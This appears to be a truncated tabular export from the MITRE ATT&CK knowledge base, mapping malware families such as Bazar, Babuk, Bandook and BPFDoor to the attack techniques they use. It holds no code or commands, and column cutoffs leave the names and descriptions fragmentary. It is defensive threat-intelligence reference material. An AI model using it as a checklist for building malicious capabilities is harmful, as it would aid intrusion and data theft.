S0128 BADNEWS malware-- software uses T1547.001Registry Ruattack-pat technique [BADNEWS](h
S0128 BADNEWS malware-- software uses T1053.005Scheduled attack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1113 Screen Capattack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1132.001Standard Eattack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1573.001Symmetric attack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1071.001Web Protocattack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1059.003Windows Cattack-pat technique [BADNEWS](
S0470 BBK malware--fsoftware uses T1140 Deobfuscatattack-pat technique [BBK](https
S0470 BBK malware--fsoftware uses T1105 Ingress Tooattack-pat technique [BBK](https
S0470 BBK malware--fsoftware uses T1106 Native API attack-pat technique [BBK](https
S0470 BBK malware--fsoftware uses T1055 Process Injattack-pat technique [BBK](https
S0470 BBK malware--fsoftware uses T1027.003Steganogr attack-pat technique [BBK](https
S0470 BBK malware--fsoftware uses T1071.001Web Protocattack-pat technique [BBK](https
S0470 BBK malware--fsoftware uses T1059.003Windows Cattack-pat technique [BBK](https
S0127 BBSRAT malware--6software uses T1560.002Archive viaattack-pat technique [BBSRAT](ht
S0127 BBSRAT malware--6software uses T1546.015Componentattack-pat technique [BBSRAT](h
S0127 BBSRAT malware--6software uses T1574.002DLL Side-L attack-pat technique DLL side-lo
S0127 BBSRAT malware--6software uses T1140 Deobfuscatattack-pat technique [BBSRAT](ht
S0127 BBSRAT malware--6software uses T1070.004File Deleti attack-pat technique [BBSRAT](ht
S0127 BBSRAT malware--6software uses T1083 File and Di attack-pat technique [BBSRAT](ht
S0127 BBSRAT malware--6software uses T1057 Process Di attack-pat technique [BBSRAT](ht
S0127 BBSRAT malware--6software uses T1055.012Process Hoattack-pat technique [BBSRAT](ht
S0127 BBSRAT malware--6software uses T1547.001Registry Ruattack-pat technique [BBSRAT](h
S0127 BBSRAT malware--6software uses T1569.002Service Ex attack-pat technique [BBSRAT](ht
S0127 BBSRAT malware--6software uses T1573.001Symmetric attack-pat technique [BBSRAT](ht
S0127 BBSRAT malware--6software uses T1007 System Serattack-pat technique [BBSRAT](ht
S0127 BBSRAT malware--6software uses T1071.001Web Protocattack-pat technique [BBSRAT](h
S0127 BBSRAT malware--6software uses T1543.003Windows Se attack-pat technique [BBSRAT](ht
S1136 BFG Agonizmalware--dsoftware uses T1554 Compromise attack-pat technique [BFG Agoniz
S1136 BFG Agonizmalware--dsoftware uses T1561.002Disk Struc attack-pat technique [BFG Agoniz
S1136 BFG Agonizmalware--dsoftware uses T1490 Inhibit Sy attack-pat technique [BFG Agoniz
S1136 BFG Agonizmalware--dsoftware uses T1529 System Sh attack-pat technique [BFG Agoniz
S0017 BISCUIT malware-- software uses T1573.002Asymmetricattack-pat technique [BISCUIT](
S0017 BISCUIT malware-- software uses T1008 Fallback C attack-pat technique [BISCUIT](
S0017 BISCUIT malware-- software uses T1105 Ingress Tooattack-pat technique [BISCUIT](
S0017 BISCUIT malware-- software uses T1056.001Keyloggingattack-pat technique [BISCUIT](
S0017 BISCUIT malware-- software uses T1057 Process Di attack-pat technique [BISCUIT](
S0017 BISCUIT malware-- software uses T1113 Screen Capattack-pat technique [BISCUIT](
S0017 BISCUIT malware-- software uses T1082 System Inf attack-pat technique [BISCUIT](
S0017 BISCUIT malware-- software uses T1033 System Own attack-pat technique [BISCUIT](
S0017 BISCUIT malware-- software uses T1124 System Timattack-pat technique [BISCUIT](
S0017 BISCUIT malware-- software uses T1059.003Windows Cattack-pat technique [BISCUIT](
S0190 BITSAdmintool--6476 software uses T1197 BITS Jobs attack-pat technique [BITSAdmin]
S0190 BITSAdmintool--6476 software uses T1048.003Exfiltrati attack-pat technique [BITSAdmin]
S0190 BITSAdmintool--6476 software uses T1105 Ingress Tooattack-pat technique [BITSAdmin]
S0190 BITSAdmintool--6476 software uses T1570 Lateral Tooattack-pat technique [BITSAdmin]
S0069 BLACKCOFFmalware-- software uses T1102.002Bidirectio attack-pat technique [BLACKCOFFE
S0069 BLACKCOFFmalware-- software uses T1102.001Dead Dropattack-pat technique [BLACKCOFFE
S0069 BLACKCOFFmalware-- software uses T1070.004File Deleti attack-pat technique [BLACKCOFFE
S0069 BLACKCOFFmalware-- software uses T1083 File and Di attack-pat technique [BLACKCOFFE
S0069 BLACKCOFFmalware-- software uses T1104 Multi-Stag attack-pat technique [BLACKCOFFE
S0069 BLACKCOFFmalware-- software uses T1057 Process Di attack-pat technique [BLACKCOFFE
S0069 BLACKCOFFmalware-- software uses T1059.003Windows Cattack-pat technique [BLACKCOFFE
S0520 BLINDING malware-- software uses T1553.002Code Signi attack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1005 Data from attack-pat technique [BLINDING
S0520 BLINDING malware-- software uses T1140 Deobfuscatattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1027.013Encrypted/attack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1041 Exfiltratio attack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1070.004File Deleti attack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1083 File and Di attack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1105 Ingress Tooattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1204.002Malicious Fattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1036.005Match Legiattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1218.011Rundll32 attack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1129 Shared Moattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1027.002Software Pattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1566.001Spearphishattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1132.001Standard Eattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1573.001Symmetric attack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1082 System Inf attack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1016 System Netattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1070.006Timestompattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1071.001Web Protocattack-pat technique [BLINDINGC
S0520 BLINDING malware-- software uses T1059.003Windows Cattack-pat technique [BLINDINGC
S0657 BLUELIGHTmalware-- software uses T1560 Archive Coattack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1560.003Archive vi attack-pat technique [BLUELIGHT
S0657 BLUELIGHTmalware-- software uses T1102.002Bidirectio attack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1555.003Credential attack-pat technique [BLUELIGHT
S0657 BLUELIGHTmalware-- software uses T1027.013Encrypted/attack-pat technique [BLUELIGHT
S0657 BLUELIGHTmalware-- software uses T1041 Exfiltratio attack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1070.004File Deleti attack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1083 File and Di attack-pat technique [BLUELIGHT
S0657 BLUELIGHTmalware-- software uses T1105 Ingress Tooattack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1057 Process Di attack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1113 Screen Capattack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1518.001Security S attack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1539 Steal Web attack-pat technique [BLUELIGHT
S0657 BLUELIGHTmalware-- software uses T1497.001System Cheattack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1082 System Inf attack-pat technique [BLUELIGHT
S0657 BLUELIGHTmalware-- software uses T1016 System Netattack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1033 System Own attack-pat technique [BLUELIGHT
S0657 BLUELIGHTmalware-- software uses T1124 System Timattack-pat technique [BLUELIGHT]
S0657 BLUELIGHTmalware-- software uses T1071.001Web Protocattack-pat technique [BLUELIGHT]
S0360 BONDUPDAmalware-- software uses T1071.004DNS attack-pat technique [BONDUPDAT
S0360 BONDUPDAmalware-- software uses T1568.002Domain Gen attack-pat technique [BONDUPDAT
S0360 BONDUPDAmalware-- software uses T1564.003Hidden Wi attack-pat technique [BONDUPDAT
S0360 BONDUPDAmalware-- software uses T1105 Ingress Tooattack-pat technique [BONDUPDATE
S0360 BONDUPDAmalware-- software uses T1059.001PowerShellattack-pat technique [BONDUPDATE
S0360 BONDUPDAmalware-- software uses T1053.005Scheduled attack-pat technique [BONDUPDATE
S0360 BONDUPDAmalware-- software uses T1059.003Windows Cattack-pat technique [BONDUPDAT
S0415 BOOSTWRImalware-- software uses T1553.002Code Signi attack-pat technique [BOOSTWRITE
S0415 BOOSTWRImalware-- software uses T1574.001DLL Searchattack-pat technique [BOOSTWRITE
S0415 BOOSTWRImalware-- software uses T1140 Deobfuscatattack-pat technique [BOOSTWRITE
S0415 BOOSTWRImalware-- software uses T1027.013Encrypted/attack-pat technique [BOOSTWRITE
S0415 BOOSTWRImalware-- software uses T1129 Shared Moattack-pat technique [BOOSTWRIT
S0114 BOOTRASHmalware--dsoftware uses T1542.003Bootkit attack-pat technique [BOOTRASH]
S0114 BOOTRASHmalware--dsoftware uses T1564.005Hidden Fil attack-pat technique [BOOTRASH](
S1161 BPFDoor malware-- software uses T1036.009Break Procattack-pat technique After initi
S1161 BPFDoor malware-- software uses T1562.004Disable or attack-pat technique [BPFDoor](h
S1161 BPFDoor malware-- software uses T1480 Execution attack-pat technique [BPFDoor](h
S1161 BPFDoor malware-- software uses T1070.004File Deleti attack-pat technique After initi
S1161 BPFDoor malware-- software uses T1564.011Ignore Procattack-pat technique [BPFDoor](h
S1161 BPFDoor malware-- software uses T1562.003Impair Comattack-pat technique [BPFDoor](h
S1161 BPFDoor malware-- software uses T1070 Indicator attack-pat technique [BPFDoor](h
S1161 BPFDoor malware-- software uses T1036.004Masquerade attack-pat technique [BPFDoor](
S1161 BPFDoor malware-- software uses T1027 Obfuscatedattack-pat technique [BPFDoor](h
S1161 BPFDoor malware-- software uses T1205.002Socket Filt attack-pat technique [BPFDoor](h
S1161 BPFDoor malware-- software uses T1070.006Timestompattack-pat technique [BPFDoor](h
S1161 BPFDoor malware-- software uses T1059.004Unix Shell attack-pat technique [BPFDoor](h
S0014 BS2005 malware-- software uses T1132.001Standard Eattack-pat technique [BS2005](h
S0043 BUBBLEWRmalware-- software uses T1095 Non-Applicattack-pat technique [BUBBLEWRA
S0043 BUBBLEWRmalware-- software uses T1082 System Inf attack-pat technique [BUBBLEWRA
S0043 BUBBLEWRmalware-- software uses T1071.001Web Protocattack-pat technique [BUBBLEWRA
S1118 BUSHWALKmalware-- software uses T1554 Compromise attack-pat technique [BUSHWALK]
S1118 BUSHWALKmalware-- software uses T1140 Deobfuscatattack-pat technique [BUSHWALK]
S1118 BUSHWALKmalware-- software uses T1105 Ingress Tooattack-pat technique [BUSHWALK]
S1118 BUSHWALKmalware-- software uses T1027 Obfuscatedattack-pat technique [BUSHWALK]
S1118 BUSHWALKmalware-- software uses T1205 Traffic Signattack-pat technique [BUSHWALK]
S1118 BUSHWALKmalware-- software uses T1505.003Web Shell attack-pat technique [BUSHWALK](
S0638 Babuk malware-- software uses T1486 Data Encryattack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1140 Deobfuscatattack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1562.001Disable or attack-pat technique [Babuk](htt
S0638 Babuk malware-- software uses T1083 File and Di attack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1490 Inhibit Sy attack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1106 Native API attack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1135 Network Shattack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1057 Process Di attack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1489 Service Stoattack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1027.002Software Pattack-pat technique Versions o
S0638 Babuk malware-- software uses T1082 System Inf attack-pat technique [Babuk](htt
S0638 Babuk malware-- software uses T1049 System Netattack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1007 System Serattack-pat technique [Babuk](ht
S0638 Babuk malware-- software uses T1059.003Windows Cattack-pat technique [Babuk](ht
S0414 BabyShark malware--dsoftware uses T1140 Deobfuscatattack-pat technique [BabyShark]
S0414 BabyShark malware--dsoftware uses T1070.004File Deleti attack-pat technique [BabyShark]
S0414 BabyShark malware--dsoftware uses T1083 File and Di attack-pat technique [BabyShark]
S0414 BabyShark malware--dsoftware uses T1105 Ingress Tooattack-pat technique [BabyShark
S0414 BabyShark malware--dsoftware uses T1056.001Keyloggingattack-pat technique [BabyShark
S0414 BabyShark malware--dsoftware uses T1218.005Mshta attack-pat technique [BabyShark
S0414 BabyShark malware--dsoftware uses T1057 Process Di attack-pat technique [BabyShark
S0414 BabyShark malware--dsoftware uses T1012 Query Regiattack-pat technique [BabyShark
S0414 BabyShark malware--dsoftware uses T1547.001Registry Ruattack-pat technique [BabyShark]
S0414 BabyShark malware--dsoftware uses T1053.005Scheduled attack-pat technique [BabyShark
S0414 BabyShark malware--dsoftware uses T1132.001Standard Eattack-pat technique [BabyShark]
S0414 BabyShark malware--dsoftware uses T1082 System Inf attack-pat technique [BabyShark
S0414 BabyShark malware--dsoftware uses T1016 System Netattack-pat technique [BabyShark
S0414 BabyShark malware--dsoftware uses T1033 System Own attack-pat technique [BabyShark
S0414 BabyShark malware--dsoftware uses T1059.003Windows Cattack-pat technique [BabyShark
S0475 BackConfigmalware-- software uses T1553.002Code Signi attack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1027.010Command aOttack-pat technique [BackConfi
S0475 BackConfigmalware-- software uses T1140 Deobfuscatattack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1070.004File Deleti attack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1083 File and Di attack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1564.001Hidden Fileattack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1105 Ingress Tooattack-pat technique [BackConfi
S0475 BackConfigmalware-- software uses T1204.001Malicious Lattack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1036.005Match Legiattack-pat technique [BackConfi
S0475 BackConfigmalware-- software uses T1106 Native API attack-pat technique [BackConfi
S0475 BackConfigmalware-- software uses T1137.001Office Temattack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1053.005Scheduled attack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1082 System Inf attack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1059.005Visual Basiattack-pat technique [BackConfi
S0475 BackConfigmalware-- software uses T1071.001Web Protocattack-pat technique [BackConfig
S0475 BackConfigmalware-- software uses T1059.003Windows Cattack-pat technique [BackConfi
S0093 Backdoor.Omalware-- software uses T1560 Archive Coattack-pat technique [Backdoor.O
S0093 Backdoor.Omalware-- software uses T1555.003Credential attack-pat technique Some [Back
S0093 Backdoor.Omalware-- software uses T1087.003Email Accoattack-pat technique [Backdoor.O
S0093 Backdoor.Omalware-- software uses T1070.004File Deleti attack-pat technique [Backdoor.O
S0093 Backdoor.Omalware-- software uses T1083 File and Di attack-pat technique [Backdoor.O
S0093 Backdoor.Omalware-- software uses T1105 Ingress Tooattack-pat technique [Backdoor.
S0093 Backdoor.Omalware-- software uses T1046 Network Seattack-pat technique [Backdoor.O
S0093 Backdoor.Omalware-- software uses T1057 Process Di attack-pat technique [Backdoor.O
S0093 Backdoor.Omalware-- software uses T1055 Process Injattack-pat technique [Backdoor.O
S0093 Backdoor.Omalware-- software uses T1547.001Registry Ruattack-pat technique [Backdoor.O
S0093 Backdoor.Omalware-- software uses T1018 Remote Sysattack-pat technique [Backdoor.
S0093 Backdoor.Omalware-- software uses T1218.011Rundll32 attack-pat technique [Backdoor.
S0093 Backdoor.Omalware-- software uses T1132.001Standard Eattack-pat technique Some [Back
S0093 Backdoor.Omalware-- software uses T1082 System Inf attack-pat technique [Backdoor.
S0093 Backdoor.Omalware-- software uses T1016 System Netattack-pat technique [Backdoor.O
S0093 Backdoor.Omalware-- software uses T1033 System Own attack-pat technique [Backdoor.O
S0606 Bad Rabbitmalware-- software uses T1548.002Bypass Useattack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1486 Data Encryattack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1189 Drive-by C attack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1210 Exploitatioattack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1495 Firmware Cattack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1003.001LSASS Memattack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1204.002Malicious Fattack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1036.005Match Legiattack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1106 Native API attack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1135 Network Shattack-pat technique [Bad Rabbi
S0606 Bad Rabbitmalware-- software uses T1110.003Password Sattack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1057 Process Di attack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1218.011Rundll32 attack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1053.005Scheduled attack-pat technique [Bad Rabbit
S0606 Bad Rabbitmalware-- software uses T1569.002Service Ex attack-pat technique [Bad Rabbi
S0337 BadPatch malware-- software uses T1005 Data from attack-pat technique [BadPatch](
S0337 BadPatch malware-- software uses T1083 File and Di attack-pat technique [BadPatch](
S0337 BadPatch malware-- software uses T1105 Ingress Tooattack-pat technique [BadPatch]
S0337 BadPatch malware-- software uses T1056.001Keyloggingattack-pat technique [BadPatch](
S0337 BadPatch malware-- software uses T1074.001Local Data attack-pat technique [BadPatch](
S0337 BadPatch malware-- software uses T1071.003Mail Protocattack-pat technique [BadPatch](
S0337 BadPatch malware-- software uses T1547.001Registry Ruattack-pat technique [BadPatch](
S0337 BadPatch malware-- software uses T1113 Screen Capattack-pat technique [BadPatch](
S0337 BadPatch malware-- software uses T1518.001Security S attack-pat technique [BadPatch](
S0337 BadPatch malware-- software uses T1497.001System Cheattack-pat technique [BadPatch](
S0337 BadPatch malware-- software uses T1082 System Inf attack-pat technique [BadPatch]
S0337 BadPatch malware-- software uses T1071.001Web Protocattack-pat technique [BadPatch](
S0234 Bandook malware-- software uses T1123 Audio Captattack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1553.002Code Signi attack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1059 Command attack-pat
an technique [Bandook](
S0234 Bandook malware-- software uses T1005 Data from attack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1140 Deobfuscatattack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1041 Exfiltratio attack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1070.004File Deleti attack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1083 File and Di attack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1105 Ingress Tooattack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1056.001Keyloggingattack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1204.002Malicious Fattack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1106 Native API attack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1095 Non-Applicattack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1120 Peripheral attack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1059.001PowerShellattack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1055.012Process Hoattack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1059.006Python attack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1113 Screen Capattack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1566.001Spearphishattack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1027.003Steganogr attack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1573.001Symmetric attack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1082 System Inf attack-pat technique [Bandook](h
S0234 Bandook malware-- software uses T1016 System Netattack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1125 Video Captattack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1059.005Visual Basiattack-pat technique [Bandook](
S0234 Bandook malware-- software uses T1059.003Windows Cattack-pat technique [Bandook](
S0239 Bankshot malware-- software uses T1119 Automatedattack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1134.002Create Proattack-pat technique [Bankshot]
S0239 Bankshot malware-- software uses T1005 Data from attack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1140 Deobfuscatattack-pat technique [Bankshot]
S0239 Bankshot malware-- software uses T1087.002Domain Acattack-pat technique [Bankshot]
S0239 Bankshot malware-- software uses T1041 Exfiltratio attack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1203 Exploitatioattack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1070.004File Deleti attack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1083 File and Di attack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1070 Indicator attack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1105 Ingress Tooattack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1087.001Local Acco attack-pat technique [Bankshot]
S0239 Bankshot malware-- software uses T1112 Modify Regattack-pat technique [Bankshot]
S0239 Bankshot malware-- software uses T1106 Native API attack-pat technique [Bankshot]
S0239 Bankshot malware-- software uses T1132.002Non-Standaattack-pat technique [Bankshot]
S0239 Bankshot malware-- software uses T1571 Non-Standaattack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1057 Process Di attack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1001.003Protocol o attack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1012 Query Regiattack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1082 System Inf attack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1070.006Timestompattack-pat technique [Bankshot](
S0239 Bankshot malware-- software uses T1071.001Web Protocattack-pat technique [Bankshot]
S0239 Bankshot malware-- software uses T1059.003Windows Cattack-pat technique [Bankshot]
S0239 Bankshot malware-- software uses T1543.003Windows Se attack-pat technique [Bankshot](
S0534 Bazar malware--9software uses T1573.002Asymmetricattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1197 BITS Jobs attack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1070.009Clear Persiattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1553.002Code Signi attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1005 Data from attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1140 Deobfuscatattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1562.001Disable or attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1087.002Domain Acattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1568.002Domain Gen attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1482 Domain Truattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1036.007Double Fileattack-pat technique The [Bazar]
S0534 Bazar malware--9software uses T1027.007Dynamic APattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1027.013Encrypted/attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1008 Fallback C attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1070.004File Deleti attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1083 File and Di attack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1105 Ingress Tooattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1087.001Local Acco attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1204.001Malicious Lattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1036.004Masquerade attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1036.005Match Legiattack-pat technique The [Bazar
S0534 Bazar malware--9software uses T1104 Multi-Stag attack-pat technique The [Bazar]
S0534 Bazar malware--9software uses T1106 Native API attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1135 Network Shattack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1059.001PowerShellattack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1057 Process Di attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1055.013Process Doattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1055.012Process Hoattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1055 Process Injattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1012 Query Regiattack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1547.001Registry Ruattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1018 Remote Sysattack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1053.005Scheduled attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1518.001Security S attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1547.009Shortcut Mattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1518 Software Dattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1027.002Software Pattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1566.002Spearphishattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1573.001Symmetric attack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1082 System Inf attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1614.001System Lanattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1016 System Netattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1033 System Own attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1124 System Timattack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1497.003Time Basedattack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1497 Virtualiza attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1071.001Web Protocattack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1102 Web Servicattack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1059.003Windows Cattack-pat technique [Bazar](ht
S0534 Bazar malware--9software uses T1047 Windows M attack-pat technique [Bazar](htt
S0534 Bazar malware--9software uses T1547.004Winlogon Hattack-pat technique [Bazar](htt
S0574 BendyBearmalware-- software uses T1140 Deobfuscatattack-pat technique [BendyBear
S0574 BendyBearmalware-- software uses T1027.013Encrypted/attack-pat technique [BendyBear
S0574 BendyBearmalware-- software uses T1105 Ingress Tooattack-pat technique [BendyBear
S0574 BendyBearmalware-- software uses T1001.001Junk Data attack-pat technique [BendyBear
S0574 BendyBearmalware-- software uses T1106 Native API attack-pat technique [BendyBear
S0574 BendyBearmalware-- software uses T1571 Non-Standaattack-pat technique [BendyBear
S0574 BendyBearmalware-- software uses T1027.014Polymorphiattack-pat technique BendyBear
S0574 BendyBearmalware-- software uses T1012 Query Regiattack-pat technique [BendyBear
S0574 BendyBearmalware-- software uses T1573.001Symmetric attack-pat technique [BendyBear
S0574 BendyBearmalware-- software uses T1124 System Timattack-pat technique [BendyBear]
S0574 BendyBearmalware-- software uses T1497.003Time Basedattack-pat technique [BendyBear
S0268 Bisonal malware-- software uses T1137.006Add-ins attack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1027.001Binary Padattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1005 Data from attack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1140 Deobfuscatattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1568 Dynamic Reattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1027.013Encrypted/attack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1041 Exfiltratio attack-pat technique [Bisonal](
S0268 Bisonal malware-- software uses T1070.004File Deleti attack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1083 File and Di attack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1105 Ingress Tooattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1204.002Malicious Fattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1036 Masqueradattack-pat technique [Bisonal](
S0268 Bisonal malware-- software uses T1036.005Match Legiattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1112 Modify Regattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1106 Native API attack-pat technique [Bisonal](
S0268 Bisonal malware-- software uses T1095 Non-Applicattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1057 Process Di attack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1090 Proxy attack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1012 Query Regiattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1547.001Registry Ruattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1218.011Rundll32 attack-pat technique [Bisonal](
S0268 Bisonal malware-- software uses T1027.002Software Pattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1566.001Spearphishattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1132.001Standard Eattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1573.001Symmetric attack-pat technique [Bisonal](h
